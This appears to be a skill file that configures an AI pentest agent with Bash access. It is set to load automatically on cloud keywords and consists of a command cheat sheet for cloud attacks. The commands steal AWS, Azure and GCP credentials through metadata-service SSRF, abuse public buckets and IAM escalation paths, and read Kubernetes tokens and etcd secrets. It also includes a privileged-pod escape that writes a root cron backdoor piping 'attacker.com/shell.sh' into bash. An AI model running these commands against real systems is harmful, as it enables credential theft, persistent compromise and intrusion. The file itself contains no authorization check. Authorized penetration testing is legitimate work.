- name
- pentest-cloud
- description
- Pentest: AWS/Azure/GCP/Kubernetes misconfiguration exploitation and cloud attack patterns.
- triggers
- {"keywords":["aws","azure","gcp","kubernetes","k8s","s3","iam","metadata","cloud security","imds","service account","rbac","ecr","storage bucket"]}
- auto_load_when
- Testing cloud infrastructure, container environments, or cloud-hosted applications
- agent
- pentest
- tools
- ["Read","Bash","WebFetch"]
# Cloud Security โ Attack Patterns
---
## AWS
### IMDS (Instance Metadata) via SSRF
```bash
# If you have SSRF on an AWS-hosted app:
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
# Returns temporary AWS credentials:
# AccessKeyId, SecretAccessKey, Token โ use with AWS CLI
aws configure
aws s3 ls
aws iam get-user
aws sts get-caller-identity
```
### S3 Bucket Misconfiguration
```bash
# Check if bucket is public
curl -s https://BUCKET.s3.amazonaws.com/
aws s3 ls s3://BUCKET --no-sign-request
# Try anonymous upload
aws s3 cp test.txt s3://BUCKET/test.txt --no-sign-request
# Find buckets via subdomain/DNS
subfinder -d TARGET | grep s3
# Common patterns: company-dev, company-backup, company-assets
# Enumerate bucket contents (no auth)
aws s3 ls s3://BUCKET --no-sign-request --recursive
```
### IAM Privilege Escalation
```bash
# List what the current identity can do
aws iam list-attached-user-policies --user-name CURRENT_USER
aws iam list-user-policies --user-name CURRENT_USER
# Common escalation paths:
# iam:CreateAccessKey on other user โ create new credentials for admin
# iam:AttachUserPolicy โ attach AdministratorAccess to yourself
# iam:PassRole + ec2:RunInstances โ launch instance with privileged role
# lambda:CreateFunction + lambda:InvokeFunction โ execute arbitrary code as privileged role
```
---
## Azure
### IMDS via SSRF
```bash
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# Get managed identity token
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
```
### Storage Account Misconfiguration
```bash
# Anonymous blob access (if container is set to public)
curl https://ACCOUNT.blob.core.windows.net/CONTAINER?restype=container&comp=list
# SAS token abuse: check expiry, permissions, IP restrictions
# Tokens in URLs get logged in access logs and browser history
```
### Azure AD Token Abuse
```bash
# If you have a token:
curl -H "Authorization: Bearer TOKEN" \
https://graph.microsoft.com/v1.0/me
# Enumerate users
curl -H "Authorization: Bearer TOKEN" \
https://graph.microsoft.com/v1.0/users
```
---
## GCP
### Metadata via SSRF
```bash
curl -H "Metadata-Flavor: Google" \
http://metadata.google.internal/computeMetadata/v1/
# Service account token
curl -H "Metadata-Flavor: Google" \
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```
### GCS Bucket Misconfiguration
```bash
# Check public access
curl https://storage.googleapis.com/BUCKET/
gsutil ls gs://BUCKET
# Anonymous access
curl "https://storage.googleapis.com/storage/v1/b/BUCKET/o" \
-H "Authorization: Bearer TOKEN"
```
---
## Kubernetes
### Unauthenticated API Server
```bash
# Check if API server is exposed without auth
curl -sk https://K8S_API:6443/api/v1/namespaces
curl -sk https://K8S_API:6443/api/v1/pods
# List all resources
kubectl --server=https://K8S_API:6443 --insecure-skip-tls-verify get all
```
### Service Account Token Abuse
```bash
# If running inside a pod:
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -sk -H "Authorization: Bearer $TOKEN" \
https://kubernetes.default.svc/api/v1/namespaces
# Check what this SA can do
kubectl auth can-i --list --token=$TOKEN
```
### Privileged Pod Escape
```bash
# If container is privileged (securityContext.privileged: true):
# Mount host filesystem
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host
# Or: write to host cron
echo "* * * * * root curl attacker.com/shell.sh | bash" \
>> /mnt/host/etc/cron.d/backdoor
```
### RBAC Misconfigurations
```bash
# Dangerous permissions to look for:
# - wildcards: verbs: ["*"] resources: ["*"]
# - create/update on ClusterRoleBindings
# - exec on pods โ direct shell access
# - get secrets in kube-system namespace
kubectl get clusterrolebindings -o json | \
jq '.items[] | select(.roleRef.name == "cluster-admin") | .subjects'
```
### etcd Direct Access
```bash
# If etcd is exposed without TLS (port 2379):
etcdctl --endpoints=http://ETCD:2379 get / --prefix --keys-only
etcdctl --endpoints=http://ETCD:2379 get /registry/secrets --prefix
# Contains all cluster secrets in base64
```
View on GitHub